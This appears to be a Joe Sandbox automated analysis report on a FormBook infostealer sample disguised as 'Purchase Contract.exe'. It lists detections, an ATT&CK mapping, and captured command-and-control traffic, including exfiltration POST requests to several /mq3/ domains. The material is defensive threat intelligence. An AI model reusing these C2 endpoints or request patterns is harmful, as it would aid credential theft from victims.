Analysis Report Purchase Contract.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:225799
Start date:28.04.2020
Start time:03:13:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 15m 39s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Purchase Contract.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@14/10@28/7
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 37.9% (good quality ratio 34.2%)
  • Quality average: 74.1%
  • Quality standard deviation: 30.8%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 62
  • Number of non-executed functions: 340
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.10, 205.185.216.42, 104.18.136.62, 104.18.133.62, 104.18.135.62, 104.18.132.62, 104.18.134.62
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, format.com.cdn.cloudflare.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting / Whitelisted: false
Threat: FormBook
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend the observed behavior.
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior than it would with a reachable C2.



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Execution through Module Load 1 | Registry Run Keys / Startup Folder 1 | Process Injection 512 | Software Packing 2 | Credential Dumping 1 | Security Software Discovery 131 | Remote File Copy 3 | Man in the Browser 1 | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Exploitation for Client Execution 1 | Port Monitors | Accessibility Features | Disabling Security Tools 1 | Input Capture 1 | File and Directory Discovery 2 | Remote Services | Data from Local System 1 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Windows Management Instrumentation | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information 1 | Input Capture | System Information Discovery 12 | Windows Remote Management | Email Collection 1 | Automated Exfiltration | Standard Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information 2 | Credentials in Files | Virtualization/Sandbox Evasion 3 | Logon Scripts | Input Capture 1 | Data Encrypted | Standard Application Layer Protocol 14 | SIM Card Swap | Premium SMS Toll Fraud |
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading 1 | Account Manipulation | Process Discovery 2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion 3 | Brute Force | Remote System Discovery 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features |
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection 512 | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.porcber.com; Virustotal: Detection: 6%
Source: http://www.porcber.com; Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe; Virustotal: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe; ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: Purchase Contract.exe; Virustotal: Detection: 32%
Source: Purchase Contract.exe; ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match; File source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Purchase Contract.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.updategtmlg.exe.49a0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.updategtmlg.exe.57c0000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Purchase Contract.exe.5370000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

HTTP GET or POST without a user agent
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1 | Host: www.bookwormegy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1 | Host: www.bridgejfc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1 | Host: www.axcyl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1 | Host: www.3dlasermaroc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1 | Host: www.porcber.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1 | Host: www.yyw518.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1 | Host: www.vamojunto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 35.242.251.130
Source: Joe Sandbox View; IP Address: 94.136.40.82
Source: Joe Sandbox View; IP Address: 23.20.239.12
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown (5 matching entries, all unknown)
Uses a known web browser user agent for HTTP communication
Source: global traffic; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.bridgejfc.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.bridgejfc.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bridgejfc.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Source: global traffic; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.axcyl.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.axcyl.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.axcyl.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Source: global traffic; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.3dlasermaroc.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.3dlasermaroc.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.3dlasermaroc.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Source: global traffic; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.porcber.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.porcber.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.porcber.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Source: global traffic; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.yyw518.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.yyw518.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.yyw518.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Source: global traffic; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.vamojunto.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.vamojunto.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.vamojunto.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Downloads files from webservers via HTTP
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1 | Host: www.bookwormegy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1 | Host: www.bridgejfc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1 | Host: www.axcyl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1 | Host: www.3dlasermaroc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1 | Host: www.porcber.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1 | Host: www.yyw518.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1 | Host: www.vamojunto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: www.zcs-edu.com
Posts data to webserver
Source: unknown; HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.bridgejfc.com | Connection: close | Content-Length: 155035 | Cache-Control: no-cache | Origin: http://www.bridgejfc.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bridgejfc.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [hex dump of the 155035-byte form body omitted]
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 Apr 2020 01:16:56 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Urls found in memory or binary data
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.com/mq3/www.porcber.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.3dlasermaroc.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.786545955.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com/mq3/www.3dlasermaroc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.com/mq3/www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bookwormegy.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news/mq3/www.axcyl.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.newsReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com/mq3/www.matbaadukkanim.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.com/mq3/www.shimi783.info
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.kafakoc.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.com/mq3/www.brandbank.news
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.matbaadukkanim.comReferer:
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: control.exe, 00000003.00000002.2004707610.0000000000208000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com/mq3/www.kafakoc.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/www.samdeng.works
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.com/mq3/www.vamojunto.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.qadmin.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works/mq3/www.yyw518.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.worksReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/www.qadmin.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.infoReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.com/mq3/www.bookwormegy.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.usepelican.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmp, control.exe, 00000003.00000002.2009171138.0000000004B39000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmp, control.exe, 00000003.00000002.2009171138.0000000004B39000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.com/mq3/S
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.vamojunto.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.com/mq3/
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.com/mq3/www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.yyw518.comReferer:
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.com/mq3/
